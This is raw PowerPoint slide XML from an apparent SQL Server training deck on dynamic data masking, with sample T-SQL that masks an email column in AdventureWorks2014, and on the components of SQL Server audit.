        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274015" y="1327830"/>
            <a:ext cx="5415634" cy="1055767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="621474" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3136" b="0" i="0" u="none" strike="noStrike" kern="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rPr>
              <a:t>Prevent the abuse of sensitive data by hiding it from users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E53AFB2-265E-4FAD-AA35-83BE1DD5B676}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" defTabSz="913319" fontAlgn="base">
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Dynamic data masking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="423108154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Configure dynamic data masking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="442072" y="1694828"/>
            <a:ext cx="250078" cy="8229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11" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="334545" y="1344395"/>
            <a:ext cx="11179676" cy="4912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64592" marR="0" lvl="0" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="353535"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use an ALTER TABLE statement to add a masking function to the required column in the table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="334545" y="2711247"/>
            <a:ext cx="11415383" cy="860629"/>
            <a:chOff x="334545" y="1428043"/>
            <a:chExt cx="11415383" cy="860629"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="442072" y="1748458"/>
              <a:ext cx="250078" cy="5402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15" name="Rectangle 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="692150" y="1748459"/>
              <a:ext cx="11057778" cy="540212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="109728" tIns="0" rIns="91440" bIns="0" numCol="1" anchor="ctr" anchorCtr="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CREATE USER TestUser WITHOUT LOGIN;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GRANT SELECT ON Person.EmailAddress TO TestUser;    </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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Content Placeholder 2"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="334545" y="1428043"/>
              <a:ext cx="10515600" cy="274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64592" marR="0" lvl="0" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buClr>
                  <a:srgbClr val="353535"/>
                </a:buClr>
                <a:buSzPct val="90000"/>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Create new user with SELECT permission on the table, and then execute a query to view masked data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="334545" y="3724032"/>
            <a:ext cx="8763735" cy="274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164592" marR="0" lvl="0" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="353535"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Verify that the masking function changes the column with the masked field</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="692150" y="1694828"/>
            <a:ext cx="11057778" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="109728" tIns="0" rIns="91440" bIns="0" numCol="1" anchor="ctr" anchorCtr="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USE AdventureWorks2014;</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GO</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ALTER TABLE Person.EmailAddress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ALTER COLUMN EmailAddress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ADD MASKED WITH (FUNCTION = 'email()');</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BA09581-BE95-43FD-A97D-6F6C47ACCB1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="442072" y="4046187"/>
            <a:ext cx="250078" cy="46777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22" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{242A91CB-06E8-4170-BE1F-9C12A04129A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="692151" y="4046189"/>
            <a:ext cx="11057778" cy="467778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="109728" tIns="0" rIns="91440" bIns="0" numCol="1" anchor="ctr" anchorCtr="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EXECUTE AS USER = 'TestUser';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SELECT EmailAddressID, EmailAddress FROM Person.EmailAddress;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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>REVERT;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300341973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SQL Server 2017 auditing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="599328" y="3338106"/>
            <a:ext cx="11141821" cy="197268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6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="442072" y="3338106"/>
            <a:ext cx="250078" cy="1972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5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="239301" y="1287641"/>
            <a:ext cx="11928475" cy="43765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182880" tIns="146304" rIns="182880" bIns="146304" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="336145" indent="-336145" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3529" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="572691" indent="-236546" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2353" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="784338" indent="-224097" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1961" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1008435" indent="-224097" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1232531" indent="-224097" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>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3505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>SQL Server audit is the primary auditing tool in SQL Server, enabling you to track and log server-level events as well as individual database events. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>It uses Extended Events to help create and run audit-related events.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>SQL Server Audit components:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" marR="0" lvl="0" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="85000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL Server Audit</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="85000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: This container object holds a single audit specification for either server- or database-level audits. You can define multiple server audits to run simultaneously.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" marR="0" lvl="0" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="85000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server Audit Specification</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="85000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: This object tracks server-level audits and invokes the necessary Extended Events</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="85000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="85000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>as you define them. You can define only one server audit per audit container.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" marR="0" lvl="0" indent="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="85000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Database Audit Specification</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="85000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: You can define database-level events that are tracked and logged. Predefined templates help you define the database audit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
